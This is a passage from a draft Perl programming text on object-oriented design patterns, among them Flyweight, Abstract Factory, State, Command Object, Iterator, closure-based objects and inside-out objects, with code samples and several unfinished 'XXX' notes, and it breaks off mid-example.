Class::Classless is an interesting twist on the idea of using one class as a template - not only is object instance data replicated, but objects themselves are configured to have the logic and methods you want, and then are cloned for their behavior. Prototype-based languages work this way. Objects can be looked at as buckets of data and methods, where either kind of thing can be thrown into the bucket. Copying (by reference) the methods from one object into a fresh one is the work of a constructor, and is how new objects of that "class" are made. Copying the methods and the data would be a clone, according to our description of object cloning. XXX more on Class::Classless.

See also Clone on CPAN.

Problem: A class of very lightweight objects is being used in large numbers. Reusing objects by sharing references would save a lot of memory.

Solution: Instead of creating thousands of identical copies of objects, keep a cache, and hand out references to existing copies.

When: You're passing a lot of simple objects around.
You're using objects as a sort of enumeration. You've just gone OO-overboard and made everything an object.

Symptoms: Object-oriented programming is at odds with memory usage.

A Flyweight is a permutation of an "AbstractFactory" in AbstractFactory. A million tiny objects can weigh a ton. By keeping only one copy of each, memory usage can be dramatically reduced. As an alternative, Perl lets you bless scalars, which weigh about the same as an object reference. Blessed scalars aren't subject to the requirement that they be shared copies. Blessing a scalar into a package gives you an OO interface to a single value. If needed, you can later upgrade the implementation to a full-blown hash, and keep the same interface.

See Also: "ImmutableObject" in ImmutableObject, "AbstractFactory" in AbstractFactory

Synopsis: Small objects that can or should be shared, but change state.

When: You have a lot of little objects that sometimes keep one value, but sometimes change value. When someone changes the value of one, you don't want that change to show up in all of the other objects that have a pointer to that object, but you don't want to have to make a clone of that object for each object that has it, either.

Symptoms: Frequently copying objects and passing them out. Lots and lots of tiny objects can eat up memory. If you've gone so far as to represent even little things as objects, you may find that your memory isn't going as far as it used to when everything was just a scalar. You would pass out the same object to everyone, but you really want everyone to have a private copy of it.

With a small change in how your module is used, you can declare that a given instance of it never changes values. If your object computes a new value, it returns a new instance of itself with that new value, rather than updating its own state in place - a sketch of this appears below.

Returning new objects, rather than changing ones that someone else might have a reference to, avoids the problems of "ActionAtADistance" in ActionAtADistance with pointers - so long as you're using variables with the correct scope to store the pointers. [17] Returning new objects containing the new state is strictly required for overloading Perl operators. Java's String class is an example of this: you can never make changes to a String, but you can ask an existing String to compute a new String for you.

"StatePattern" in StatePattern talks about a mechanism for implementing state that consists of one "ImmutableObject" in ImmutableObject taking another in its constructor, and digesting it to initialize itself. Coupled with an "AbstractFactory" in AbstractFactory to arbitrate which subtype will be used for the next object, this is a powerful construct. It is used as the output of a Flyweight from "FlyweightPattern" in FlyweightPattern, and is an important concept for "OverloadOperators" in OverloadOperators.

Problem: Code that decides which of several subclasses to instantiate is being cut and pasted around the program.

Solution: Centralize that logic in an object. Return a subtype of some abstract type.

When: Any time polymorphism is needed: the option of subclassing should be kept open. See "AbstractRootClasses" in AbstractRootClasses. Based on circumstance, an object may be created from one of a number of subclasses. The decision of which type of object to create doesn't seem to belong where the object is created, but rather somewhere neutral.
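To make the "ImmutableObject" in ImmutableObject idea above concrete before moving on - a minimal sketch, using an invented Temperature class:

  # Nothing ever changes a Temperature in place; computing a new
  # value returns a new instance, so anyone holding the old
  # reference is safe from ActionAtADistance.
  package Temperature;

  sub new {
      my ($class, $degrees) = @_;
      bless { degrees => $degrees }, $class;
  }

  sub degrees { $_[0]{degrees} }

  # A would-be mutator returns a brand-new object instead:
  sub warmer {
      my ($self, $by) = @_;
      return (ref $self)->new($self->{degrees} + $by);
  }

  package main;

  my $mild  = Temperature->new(20);
  my $balmy = $mild->warmer(10);
  printf "%d %d\n", $mild->degrees, $balmy->degrees;   # 20 30 - original intact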
Symptoms: You split a class into two, or introduce a new or different implementation of a class under a different name. Suddenly you find yourself going through all of the code looking for references to the old package. You know that if you make a similar change in the future, you'll have to go through all of the code again.

An Abstract Factory makes the decision of which class or subclass to create when asked. This decision-making logic is tucked away in one place, rather than being spread around - think of it as putting code where it belongs. Centralizing the logic gives us a single place to make changes. The return value of the factory method is of the base class or abstract class type (essentially the same thing in Perl).

Example: to stay pure, each kind of car should do push @ISA, 'Car', so that it passes the $ob->isa('Car') test required by "TypeSafety" in TypeSafety. This lets programs know that it is a car (regardless of kind) and that it can thus be used interchangeably. See "TypeSafety" in TypeSafety.

Refactoring: "RefactoringPattern" in RefactoringPattern may lead you to turn an object from a regular object into an "AbstractFactory" in AbstractFactory. Break the code down into subclasses of ourself, and create those objects. Before breaking up the code, create the subclasses.

Class AutoVivification: Before creating the subclasses, play with letting Perl do it for you. "ClassAsTypeCode" in ClassAsTypeCode says that a class's primary type can be used to distinguish it as a special case of a generic type, even if no implementation changes. This will give us a chance to prototype working with subclasses and make sure we aren't falling prey to "EmptySubclassFailure" in EmptySubclassFailure.

  package Car::Factory;

  sub create_car {
      # this way we can do Car::Factory->create_car(...) or $carfactoryref->create_car(...)
      # see NewObjectFromExisting.
      my $self = shift;
      # $kind could be computed rather than taken verbatim from input.
      # one minimal possible body:
      my $kind  = shift;
      my $class = 'Car::' . ucfirst lc $kind;
      no strict 'refs';
      push @{"${class}::ISA"}, 'Car' unless $class->isa('Car');   # set the package up automatically
      return bless {}, $class;
  }

In most cases, you will want to compute $kind, as in our first example. Once computed, the package can be set up automatically. Resist the temptation to re-bless or convert things except into subclasses: see "NoSexUntilMarriage" in NoSexUntilMarriage.

"StatePattern" in StatePattern is similar: different objects field requests. The state object, like the "AbstractFactory" in AbstractFactory, has the criteria built in to decide which object to use. Rather than returning the selected object like the "AbstractFactory" in AbstractFactory does, it merely delegates requests to that object, holding onto references to a single instance of each type of object.

A good example of an abstract factory would be building a system that worked with both mod_perl 1 and mod_perl 2. Eventually, I'll get around to giving you an example of this. - Yes, a useful example would be nice indeed! - "ScottWalters" in ScottWalters

This doesn't make it clear where the Car::Ford (etc.) modules should get loaded, though. Wouldn't it be better to say:

  if ($topspeed < 100 and $passengers >= 4) {
      require Car::Ford;
      return new Car::Ford;
  }

A real example? Code from real examples is far too long to keep readers' attention. I'll describe a real application, and if you want the code, you can email me. A client has a cart. Items in the cart are represented as objects. Initially, everything was an 'Item'. Donations were introduced - the client is a not-for-profit corporation. Tax and shipping are computed differently on donations added to the cart. Re-using the cart for wholesale orders is on the horizon.
Once again, tax and shipping are computed differently: no tax, and shipping at actual cost. Rather than burden 'Item' with the special logic of examining its part number and deciding which of three personalities each method should have, one object is given the duty of creating an object of the right type from a selection of three. Each of the three different subclasses of 'Item' implements the relevant methods completely differently, while inheriting some common implementation. Still want to see the code? - "ScottWalters" in ScottWalters

Problem: The exact implementation of an object varies.

Solution: Create a factory that centralizes the decision-making logic surrounding which implementation to use. Channel all requests for objects for that role through the factory.

A "FactoryObject" in FactoryObject always creates objects of the same concrete type. Factories, as objects, are pluggable: which factory is used, and therefore which concrete type is created by it, can be changed.

  my $factory = new FordFactory;
  my $wifes_car = $factory->create_car();
  $wifes_car->isa('Car') or die;

  # later:

  $factory = new ChevyFactory;
  my $husbands_car = $factory->create_car();
  $husbands_car->isa('Car') or die;

Code need not be concerned with where the cars come from, only that a Car materialize upon demand. Having a second source available for things is important. If there were only one auto manufacturer, a lot fewer people would be happy with their ride. Ralph Nader never would have won a lawsuit against them. The same goes for programs. Hacking up an entire program to change which implementation you use is undesirable. Sometimes you have an implementation you really want to get rid of. Usually the decision of which factory is to be used is made at some point in configuration, though a factory may also be used to implement the "StatePattern" in StatePattern. A Factory will always create objects of the same concrete type. Contrast this with the "AbstractFactory" in AbstractFactory. Per "AbstractRootClasses" in AbstractRootClasses, every object of a new type should be both an abstract type and a concrete implementation of it. This lets you talk about objects in terms of type where "TypeSafety" in TypeSafety is concerned, and not have to change those type declarations when a new implementation is introduced. An "AbstractFactory" in AbstractFactory will create objects of a fixed abstract type, with a concrete type of its choosing. A plain old factory is useful when we're able to determine at some point what type all future manufactured objects should have for a concrete type. An "AbstractFactory" in AbstractFactory is suitable when this decision can never be finalized: the current state of the running program always sways the decision.

This supports polymorphism and "LooseCoupling" in LooseCoupling.

Synopsis: Flow control is spread all over the place. Understanding and modifying flow requires knowledge of many modules, which is error prone. Instead, centralize transitions in flow, and represent state transitions as objects. Each state object knows how to create an object representing any state immediately accessible from itself.

When: Applications, or modules, that perform many functions at different times.

Symptoms: Programs that people are scared of editing for fear of inserting terminal bugs. Programs that stop unexpectedly. "The Halting Problem" is a subject of much research. No technique exists for predicting when an arbitrary program will suddenly stop running and bail out.
Programmers of critical systems are deeply concerned with whether or not their programs contain unexpected conditions that would cause sudden, catastrophic termination. Modeling the program flow isn't a complete answer, but it addresses two important problems. Each state has a method that, given user input or the result of a computation, returns another state object, to be executed. Queues and stacks can extend the possibilities: the basic idea is only to model the transitions.

  # Non ObjectOriented:

  my $parser = do {

      my $html;        # HTML to parse
      my $tag;         # name of the current HTML tag
      my $name;        # name of the current name=value pair we're working on
      my $namevalues;  # hashref of name-value pairs inside of the current tag

      # predeclare so the closures can refer to each other
      my ($starttag, $middletag, $middlevalue);

      $starttag = sub {
          if($html =~ m{\G(</[a-z0-9]*>)}isgc) { return $starttag; }   # skip close tags
          if($html =~ m{\G<([a-z0-9]+)}isgc)   { $tag = $1; $namevalues = {}; return $middletag; }
          if($html =~ m{\G[^<]+}sgc)           { return $starttag; }
          return undef;
      };

      $middletag = sub {
          if($html =~ m{\G\s+}sgc)          { return $middletag; }
          if($html =~ m{\G([a-z0-9]+)}isgc) { $name = $1; return $middlevalue; }
          if($html =~ m{\G>}sgc)            { $namevalues->{$name} = 1 if $name; return $starttag; }
          return undef;
      };

      $middlevalue = sub {
          if($html =~ m{\G=\s*(['"])(.*?)\1}sgc) { $namevalues->{$name} = $2 if $name; return $middletag; }
          if($html =~ m{\G\s+}sgc)               { return $middlevalue; }
          return $middletag;
      };

      sub {
          $html = shift;
          return $starttag;
      };
  };

  open my $f, 'page.html' or die $!;
  read $f, my $page, -s $f;
  close $f;

  $parser = $parser->($page);
  $parser = $parser->() while $parser;

Of course, rather than iterating through $parser and using it as a generator, we could blow the stack and make it do the recursive calls itself. In general, return $foo; would be replaced with return $foo->();. XXX I wonder if the parser could do $_[0] = next object, so that merely saying $parser->(foo) would work in place of $parser = $parser->(foo)... that would be nifty!

The observant reader will notice that each anonymous subroutine we define represents a state in our grammar. At any given moment, there are only a few things which are valid, so there is no point in looking for everything. Doing so would lead to confusion and bugs. We could rewrite this to be cleaner and use fewer variables, but I chose this presentation because of its extremely regular structure. XXX example.

See Also: "StatePattern" in StatePattern, "ImmutableObject" in ImmutableObject, "MomentoPattern" in MomentoPattern - implement the state transitions in your program as objects. Related concepts: "IteratorInterface" in IteratorInterface.

new() might be thought of as the creator of objects, but we know bless() is how objects are really made. Object creation is really little more than:

  my $ob = bless { color => 'yellow', size => 'large' }, 'GetAndSet';

Of course, we need to back this up with some implementation:

  package GetAndSet;

  our $AUTOLOAD;

  sub AUTOLOAD {
      my $this = shift;
      (my $method) = $AUTOLOAD =~ m/::(.*)$/;
      return if $method eq 'DESTROY';
      (my $request, my $attribute) = $method =~ m/^([a-z]+)_(.*)/;
      if($request eq 'set') {
          $this->{$attribute} = shift;
          return 1;
      }
      if($request eq 'get') {
          return $this->{$attribute};
      }
      die "unknown operation '$method'";
  }

Of course, this is considered cheating. You should always use real, explicitly defined methods. Okay, usually.

  /*
   * If you are going to copy this file, in the purpose of changing
   * it a little to your own need, beware:
   *
   * First try one of the following:
   *
   * 1. Do clone_object(), and then configure it.
   *    This object is specially
   *    prepared for configuration.
   *
   * 2. If you still is not pleased with that, create a new empty
   *    object, and make an inheritance of this objet on the first line.
   *    This will automatically copy all variables and functions from the
   *    original object. Then, add the functions you want to change. The
   *    original function can still be accessed with '::' prepended on the name.
   *
   * The maintainer of this LPmud might become sad with you if you fail
   * to do any of the above. Ask other wizards if you are doubtful.
   *
   * The reason of this, is that the above saves a lot of memory.
   */

- Comment as seen on core library objects in LPMud 2.4.5

Mirroring Real-Life

If you're thinking of using inheritance - @ISA in Perl - then you should be reading this: there is a correct way to do it, and then there is what everyone else does. If you aren't thinking of using inheritance, then I wonder why you're reading this, and you probably are too.

LPMud is a dynamic adventure system. Players play while wizards code. New puzzles spring into being from within the game, while it's running. The game is, of course, object oriented, in the name of mirroring real-life object relationships. LPMud comes from the days when 24 megs was a lot of memory on a Unix server [18]. Given this object-oriented system and these 24 megs of RAM, wizards cleverly started copying core library objects around - the player object, the monster object, the weapon object - and making changes to them for their own use: a clear case of "CutAndPasteProgramming" in CutAndPasteProgramming. As you can see, that didn't go over very well. Modern motivations against "CutAndPasteProgramming" in CutAndPasteProgramming are different than lack of RAM. See "CutAndPasteProgramming" in CutAndPasteProgramming, and then, when you're sold, "AbstractClass" in AbstractClass.

Perl's equivalent to LPMud's clone_object(ob) is ob->new(), though a constructor may return a cloned or pre-configured object. See "CloningPattern" in CloningPattern. Creating object structures by holding onto references to other objects that you created with new() is known as delegation. This is the basis of most object patterns in this book. Perl's equivalent to inherit is use base. Creating object structures using inheritance is another matter; such structures are best avoided. Inheritance should be used to build specialized versions of generic objects - not to generalize further, and not to combine general objects to make something new. Inheritance shouldn't be confused with exporting. Exporting adds features to a package, very much like inheritance, but those features are used by that object only. Exporting isn't used by sane people to build new types of objects. If you want Carp, for instance, you'll use Carp yourself, and not attempt to call croak in another object that happens to use Carp. See "ExportingPattern" in ExportingPattern.

Problem: The base class is simple, and subclasses are frequently implementing the same features on top of the base class, but in different combinations.

Solution: Allow objects to handle methods differently depending on their state, rather than demanding that every possible behavior be exhibited by a separate object. Move shared behavior upwards, even if not every subclass ultimately uses it. Make the base class the general case, and allow subclasses to remove features - permanently or conditionally - to create special-purpose versions. Given a special case of something that isn't really one at all, refactor. Gimpy versions of objects are still merely versions of those objects.
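Anticipating the parrot example below, here is a minimal sketch of modeling a missing ability as state rather than forking the inheritance tree. The Parrot class and its alive flag are invented for the example:

  # A dead parrot is still a parrot. The ability to squawk is state,
  # not a separate subclass.
  package Parrot;

  sub new { bless { alive => 1 }, shift }

  sub expire { $_[0]{alive} = 0 }

  # A request to squawk, never a guarantee of a squawk:
  sub squawk {
      my $self = shift;
      return unless $self->{alive};   # null behavior, not a missing method
      print "Squawk!\n";
  }

  package main;

  my $polly = Parrot->new;
  $polly->squawk;    # Squawk!
  $polly->expire;
  $polly->squawk;    # silence - but still a Parrot, still safe to call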
Lack of a feature doesn't automatically make something a candidate for superclasshood. In general, there is no harm adding functionality to the base class: this is often the cleanest solution, and the quickest way to make it available to all of the subclasses. "DecoratorPattern" in DecoratorPattern talks about a degenerate situation where programmers attempt to create endless combinations of features and ultimately fail.

Simple Rules: A parrot that is as dead as a doornail is still just a special case of parrots, and parrots in general have facilities to perch(), squak(), eat() and bite(). Whether or not these facilities are working, and what their exact behavior is, can be left to the subclass. Perhaps the parrot is pining for the fjords and doesn't feel like squak()ing. Perhaps it's deceased, but a parrot nonetheless. Inheritance is "specialized case of", not "made out of". A bird is not a specialized case of a beak and legs. For composing something out of mix and match parts, use composition: see "CompositePattern" in CompositePattern.

A call to squak() in a parrot is a notification that it should squak, or a request that it squak, never a guarantee that a squak will be emitted. "AbstractClass" in AbstractClass and "FunctionalityIsToBeShared" in FunctionalityIsToBeShared [19] tell us to move functionality as high up the inheritance chain as is useful. "StatePattern" in StatePattern suggests delegating requests to a different object depending upon state, where each object you delegate to represents a state. This satisfies our requirement that objects not be swapped out at runtime, and that polymorphism be maintained [20], even when the bird goes into a "dead" state. We still maintain the same presentation - unlike "RunAndReturnSuccessor" in RunAndReturnSuccessor, a completely different object isn't swapped in in our place. Only behind the scenes, through a cleverly placed layer of delegation, is statehood implemented in terms of objects. This satisfies the "LawOfDemeter" in LawOfDemeter.

See Also

Synopsis: Use a Value Object to communicate the details of the action that is desired.

When: There is a proliferation of similar methods, and the interface to implement that kind of object is becoming unwieldy.

Symptoms: Too many public methods for other objects to call. An interface that is unworkable and always changing. You feel that a method name must include prose describing the exact action, and this is preventing layering your code.

A "CommandObject" in CommandObject is a case of using a value object to communicate which action is to be performed, along with any argument data. This is sent to a single method in the class that handles commands of the given type. That object is free to implement command processing with a switch, a variable method dispatch, or a call to a variable subclass. This lets you make changes to which commands are defined only in the definition of the command object itself and the classes that actually use that command, rather than every class that wants to implement the command processing interface. A sketch of the command object itself follows.
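The dispatch examples below expect only a constructor and a getInstructionCode() accessor, so a minimal command class might look something like this - a hedged sketch, not the original's code; the names and argument layout are only illustrative:

package BleahCommand;

sub new {
    my $class = shift;
    my %args  = @_;
    die "instruction code required" unless defined $args{instruction};
    # keep the instruction plus whatever argument data the handler may want
    return bless { %args }, $class;
}

sub getInstructionCode {
    my $self = shift;
    return $self->{instruction};
}

1;

A caller builds one and hands it to whatever object processes commands of this type:

my $cmd = BleahCommand->new(instruction => 'PUT', key => 'color', value => 'red');
$receiver->doCommand($cmd);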
It also frees up the object implementing the command processing interface to use any number of ideas for dispatching the command, once it has it:

# example of a switch style arrangement:

sub doCommand {
  my $me = shift;
  my $cmd = shift; $cmd->isa('BleahCommand') or die;
  my $instr = $cmd->getInstructionCode();
  if($instr eq 'PUT') {
    # PUT logic here
  } elsif($instr eq 'GET') {
    # GET logic here
  }
  # etc
}

# example of a variable method call arrangement:

sub doCommand {
  my $me = shift;
  my $cmd = shift; $cmd->isa('BleahCommand') or die;
  my $instr = $cmd->getInstructionCode();
  my $func = "process_" . $instr;
  return undef unless defined &$func;
  return $func->($cmd, @_);
}

# example of a variable subclass arrangement.
# this assumes that %commandHandlers is set up with a hash of object references.

sub doCommand {
  my $me = shift;
  my $cmd = shift; $cmd->isa('BleahCommand') or die;
  my $instr = $cmd->getInstructionCode();
  my $objectRef = $commandHandlers{$instr};
  return $objectRef ? $objectRef->handleCommand($cmd, @_) : undef;
}

Since Perl offers AUTOLOAD, this idea could be emulated. If a package wanted to process an arbitrary and growing collection of commands to the best of its ability, it could catch all undefined method calls using AUTOLOAD, and then attempt to dispatch them (this assumes %commandHandlers is set up with a hash of object references keyed by method name):

sub AUTOLOAD {
  my $me = shift;
  (my $methodName) = $AUTOLOAD =~ m/.*::(\w+)$/;
  return if $methodName eq 'DESTROY';
  my $objectRef = $commandHandlers{$methodName};
  return $objectRef ? $objectRef->handleCommand($methodName, @_) : undef;
}

This converts calls to different methods in the current object into calls to a handleCommand() method in different objects. This is an example of using Perl to shoehorn a Command Object pattern onto a non Command Object interface. XXX virtual machine as an interpreter operating on a series of command objects.

See Also

Synopsis: Create a unified interface for iterating through data items.

When: You have objects that contain sets of things, or you have objects that are arranged into structures.

Symptoms: Each package has a slightly different way to look through data items it contains.

This is a specific example of a general idea: if there is a kind of thing that needs done, create an abstract class (a package that has only empty methods) that outlines a general interface for doing it. In this case, we're concerned about looping through a collection of values. This is a simple case. If an object doesn't directly contain the values, but instead references a network of items, we can recurse over them. This can be wrapped in an Iterator interface. [21]

Iterating through data sets which your object contains, or which other objects contain, is all fine and dandy, but this same interface gives us everything we need to iterate over data sets that don't exist at all, except perhaps in our imagination. The things we iterate over could be things that we know to exist from theory, like prime numbers. Computing things from a large set as they are needed, rather than beforehand, is called lazy evaluation. Lazy evaluation lets you set up pipelines where different parts of the program do operations on data as it is generated or read. Contrast this with the typical Perl approach of slurping everything into memory, then working on it. The second example above, rewritten as a provider, looks like the sketch below.
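The original provider code didn't survive in this copy, so here is a stand-in sketch: a generator that hands back primes one at a time, computing each only when asked. It uses trial division rather than a literal sieve, and the names are mine, not the original's:

# the provider computes values only as they are asked for

sub prime_iterator {
    my @primes;
    my $candidate = 1;
    return sub {
        CANDIDATE: while(1) {
            $candidate++;
            foreach my $p (@primes) {
                last if $p * $p > $candidate;
                next CANDIDATE unless $candidate % $p;
            }
            # nothing divided it - remember it and hand it out
            push @primes, $candidate;
            return $candidate;
        }
    };
}

my $next_prime = prime_iterator();
print $next_prime->(), "\n" for 1 .. 10;   # 2 3 5 7 11 13 17 19 23 29

Nothing is computed until the code reference is actually called, which is the whole point: a consumer pulls exactly as many values as it needs.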
Iterating and Overloading

Perl overloads the "++" operator to iterate strings through a useful realm of values:

$a = "aaa";
$a++;
print $a, "\n";   # prints "aab"

See "OverloadOperators" in OverloadOperators for how to create constructs like this yourself in Perl according to this formula. XXX - an example of exactly this would be really nice. The Sieve of Eratosthenes is often implemented in Python this way; the prime number provider sketched earlier is a Perl version of the same idea.

See Also

Generally, create things where it makes sense to, and pass them down through constructors, leaving contained objects to do with them what they wish, rather than making assumptions about their structure. Given an A that creates a B, and B needs a C that only A can create, create C, pass it to A's constructor, and let A pass it to B itself, rather than trying to take charge and set up all of the relationships yourself. An extension of the idea of encapsulation.

See Also

Synopsis: Want to use several modules across a collection of scripts, but don't want dozens of "use" lines at the top of each.

There is incentive not to split up bloated modules due to the need to go through and edit all of the scripts to use each new module-spawn. This also has all of the markings of a problem that resurfaces: should you refactor again, you'll be changing all of your modules. Leaving everything in one module is tempting. In days of lore, Perl programmers would require a single config.pl that set up variables and required other modules for them. use doesn't automatically preclude this - merely leave off the package statement, and you'll continue operating in the namespace of the program that used your module. For example, in config.pm.

See Also

Problem: Perl's object oriented programming interface sucks. "InstanceVariables" in InstanceVariables are slow to access, and require a special syntax that is unsightly and prevents easily converting procedural code to OO code. Subclass data can clobber superclass instance data unless manually prefixed with the class name. Or, you just want to integrate the functional style with the object oriented style to harness their respective strengths.

Solution: Mix functional and object oriented styles to deal with the ugliness of Perl's "InstanceVariables" in InstanceVariables syntax, write more concise programs, and use scopes for implicit data flow rather than manually passing to and reading from constructors. Perl's concept of automatically binding code to a particular variable created in a particular scope is what makes things like "InnerClasses" in InnerClasses easy.

The string "color" appears ten times. Ten! In Perl, no less. If I wrote out the constructors for the other arguments, this would be repeated for each variable. Shame. If we trust the user to pass in the right things to the constructor, we can get rid of two. Still, even typing each thing eight times is begging for a typo to come rain on your parade. If you're a LISP or Scheme programmer, you wouldn't even consider writing an atrocity like this. You'd probably write something like this:

First, the { query_name => sub { } }->{$arg}->(@_) is a sort of switch/case statement. It creates an anonymous hash of names to functions, then looks up one of the functions by name, using the first argument passed in. Once we have that code reference, we execute it and pass it our unused arguments. Then we've added a default case to it, so we don't try to execute undef as code. This could have been coded using if/elsif/else just as easily.

Lexically Defined Object: There is one little mystery left, though.
Code references are dereferenced using the $ref->(@args) syntax. The $ref->method(@args) syntax is reserved for objects. We shouldn't be able to call $ob->get_street() in our example on a code reference - unless that code reference has been blessed into a package. It just so happens that that is exactly what MessageMethod does.

package MessageMethod;

sub new {
  my $type = shift;
  my $class = ref($type) || $type;   # allow $obj->new(...) as well as MessageMethod->new(...)
  my $ref = shift;
  ref $ref eq 'CODE' or die;
  bless $ref, $class;
}

sub AUTOLOAD {
  my $me = shift;
  (my $method) = $AUTOLOAD =~ m/::(.*)$/;
  return undef if $method eq 'DESTROY';
  return wantarray ? ($me->($method, @_)) : scalar $me->($method, @_);
}

1;

Given a code reference, MessageMethod blesses it into its own package. There are no methods aside from new() and AUTOLOAD(). AUTOLOAD() handles undefined methods for Perl, and since there are no other methods, it handles nearly all of them. AUTOLOAD() merely takes the name of the function it is standing in for and sends that as the first argument to a call to the code reference, along with the rest of the arguments. We're translating $ob->foo('bar') into $ob->('foo', 'bar'). This does nothing but let us decorate our code reference with a nice OO style syntax.

We want the object paradigm, but without the syntax described in "InstanceVariables" in InstanceVariables. We need private storage for the code references, and the anonymous version of the sub statement. We need hashclosure.pm.

# place this code in hashclosure.pm
# tell Perl how to find methods in this object - run the lambda closures the object contains

sub AUTOLOAD {
  (my $method) = $AUTOLOAD =~ m/::(.*)$/;
  return if $method eq 'DESTROY';
  our $this = shift;
  if(! exists $this->{$method}) {
    my $super = "SUPER::$method";
    return $this->$super(@_);
  }
  $this->{$method}->(@_);
}

1;

This code translates method calls into invocations of anonymous subroutines of the same name inside of a blessed hash: when a method is called, we look for a hash element of that name, and if we find it, we execute it as a code reference. The flow of control goes something like:

/\/\/\/\

graph: {
  title: "Dispatch Order"
  color: lightcyan
  manhattan_edges: yes
  edge.color: lilac
  scale: 90
  node: { title:"A" label: "$foo = new Foo(); \n$foo->bar();" }
  node: { title:"A1" label: "Foo::new()" }
  node: { title:"B" label: "Foo::AUTOLOAD()" }
  node: { title:"C" label: "$foo->{'bar'}->() runs" }
  edge: { sourcename:"A" targetname:"A1" anchor: 1}
  edge: { sourcename:"A" targetname:"B" anchor: 2}
  edge: { sourcename:"B" targetname:"C" }
}

/\/\/\/\

Dropped verbatim into a .pm file, the above code doesn't change package (there is no package statement), so it defines an AUTOLOAD() method for the current package. This is a "WrapperModule" in WrapperModule of sorts. The our $this variable and the AUTOLOAD() method work together to provide easy access to $this and "InstanceVariables" in InstanceVariables. We can use object instance specific field variables directly without having to dereference a hash - see the sketch following this section for a small, self-contained example. This is the closest thing I've found to what I want to achieve, with the least work on my part, and the least chance of error.

CPAN class Package

In other news, "PerlMonks" in PerlMonks:116725 defines a class package usable as such:

my $class = new class sub{
  my $field = shift;
  $this->field = $field;
  $this->arrayref = [1,2,3];
  $this->hashref = {a => b, c => d};
  $this->method = sub{ return $this->field };
};

...allowing the anonymous, inline construction of classes.
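Here is the hashclosure.pm idea in action - a self-contained sketch with the AUTOLOAD dispatcher pasted inline (the SUPER:: fallback is dropped for brevity), and a hypothetical Counter class of my own invention standing in for the elided example:

package Counter;

# the dispatcher from hashclosure.pm, inlined so the sketch runs on its own
sub AUTOLOAD {
    our $AUTOLOAD;
    (my $method) = $AUTOLOAD =~ m/::(.*)$/;
    return if $method eq 'DESTROY';
    our $this = shift;
    die "no such method: $method" unless exists $this->{$method};
    $this->{$method}->(@_);
}

sub new {
    my $class = shift;
    my $count = 0;                        # private - shared only by the closures below
    bless {
        increment => sub { ++$count },
        decrement => sub { --$count },
        count     => sub { $count },
    }, $class;
}

package main;

my $counter = Counter->new();
$counter->increment() for 1 .. 3;
$counter->decrement();
print $counter->count(), "\n";            # prints 2

The lexical $count never appears in a hash dereference: the closures share it directly, which is exactly the "implicit data flow through scopes" this pattern promises.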
Abigail's Inside-Out Objects

Quoting Abigail:

package BaseballPlayer::Pitcher;

{
  use vars '@ISA';
  @ISA = 'BaseballPlayer';

  my (%ERA, %Strikeouts);

  sub ERA : lvalue {$ERA {+shift}}
  sub Strikeouts : lvalue {$Strikeouts {+shift}}

  sub DESTROY {
    my $self = shift;
    delete $ERA {$self}, $Strikeouts {$self}
  }
}

Taking this apart, lexical data is used instead of nametable variables, which doesn't seem to make any difference. Rather than indexing the blessed reference by a constant field name to come up with a per-object, per-field storage slot, one of these lexicals is indexed by the stringified object reference. See "PerlMonks" in PerlMonks:178518 for more.

See Also

Problem: Difficult to solve problem. All of the related logic is huge, and no control structure or organisation seems to be adequate.

Solution: Model the problem using connectors and logic items. Let scenarios play themselves out recursively across the network.

This rather large example was adapted from code in Structure and Interpretation of Computer Programs, an excellent book. The program was originally written in Scheme, the language featured in Structure and Interpretation. Even if you write nothing but Perl, C or Java all of your life, I highly recommend this book. Decomposing problems into functions is the first cautious step in learning to program; decomposing programs into objects could be seen as a second, and factoring out the recursive nature of complex problems a third. Complexity is the program killer, and its management is paramount in scaling programs as well as solving problems. In addition to adapting the example to Perl, I've adapted it to use objects rather than lambda closures. This made the code longer and less elegant, but verbose, boorish implementation is considered a virtue in this day and age.

Constrain::new() is a wee little factory that spits out subtypes on demand. We're not actually using this right now in our code, because by the time we got to the bottom of the file we forgot that we had done that. Using a factory as such is a good policy: it adds a layer of abstraction in the creation of objects, and each layer of abstraction is insurance against change, giving us a single place where we can translate the old interface to whatever is new.

Constrain::Adder is our first and only serious logic component. It should be refactored into a base class with an abstract interface and a sample implementation. Perhaps I'll get around to this later XXX, as it would make this code more directly useful to random purposes. When told what its value should be, it lashes back, sending a message out on one of its connectors informing the objects on that connector what value they must have to satisfy the condition. The Adder object does whatever it must to satisfy the constraint. The three inputs are identical in that they are all connections that may be connected to any other logic devices. They differ in that the last will be the sum of the first two. If any single input's value is unspecified, a value will be sent out on that connector. If all values are specified after a new value comes in, the last output is the one we force to fit the constraint. Should it not wish to do so, it may in turn push out a new value by calling setvalue() on the connector. Eventually, a solution that all nodes are happy with will be arrived at, or else every possibility will be exhausted. XXX - return failure should we be unable to arrive at a solution. This component has exactly three connections.

Constrain::Probe describes an object that merely repeats to the screen any value it is told to have.
This component has exactly one connection.

Constrain::Constant asserts a value on the wire and refuses to accept any other value. Should it be told to be another value, it fights back, pushing its own value back out again. This component has exactly one connection.

Finally, Constrain::Connector isn't a logical component at all - just a wire or messenger between them. It has no behavior of its own other than to relay messages from one connection out on the other connections. The above components each have a fixed number of inputs - not so with a connector. A connector may be connected to any number of components. (Protocol?) XXX - constraint system example - traffic lights. XXX - constraint system with tied variables... $tempcelcius = 100; print $tempfarenheight;

See Also

Problem: Functionality doesn't exist in a class, but should. Subclassing to add the functionality isn't appropriate - the features are needed in all existing objects retroactively.

Solution: Change over to the existing package temporarily to define some new methods in it.

Examples:

*{'ExistingPackage::new_function'} = sub {
  # new accessor
};

sub ExistingPackage::new_function {
  # new accessor
}

Any object created from ExistingPackage will instantly have a method, new_function(), after this code is run. Both examples do essentially the same thing. The first is uglier, but allows closures to be taken. Perl still considers the new function to belong to the package it was defined in [25]. This means that we can't use lexical data that was in scope when ExistingPackage was originally created, nor can we use UseVars and OurVariables that exist in ExistingPackage. Examples exist of using lexically scoped my variables for the purpose of keeping people away from your data. While not completely fool proof, it does make it inconvenient. UseVars and OurVariables are easier.

sub ExistingPackage::new_function {
  my $self = shift;
  local *existing_var = \${ref($self) . '::existing_var'};
  # code here that uses $existing_var freely, as if it were in
  # our package scope.
  $existing_var++;
}

The local *glob = \$ref idiom is, well, ugly. We compute the name of the variable - the package that $self was blessed into, concatenated with "::existing_var" - and use it as a soft reference. A reference is then taken to that soft reference using the backslash operator.

local $ExistingPackage::new_variable;

$new_variable will be static - individual objects won't have their own copy. See "StaticVariables" in StaticVariables. This is usually not the desired result. To add, and initialize, a new variable to each instance of objects from this package, redefine the constructor, new(), before any objects are made from it:

do {
  my $oldnew = \&ExistingPackage::new;
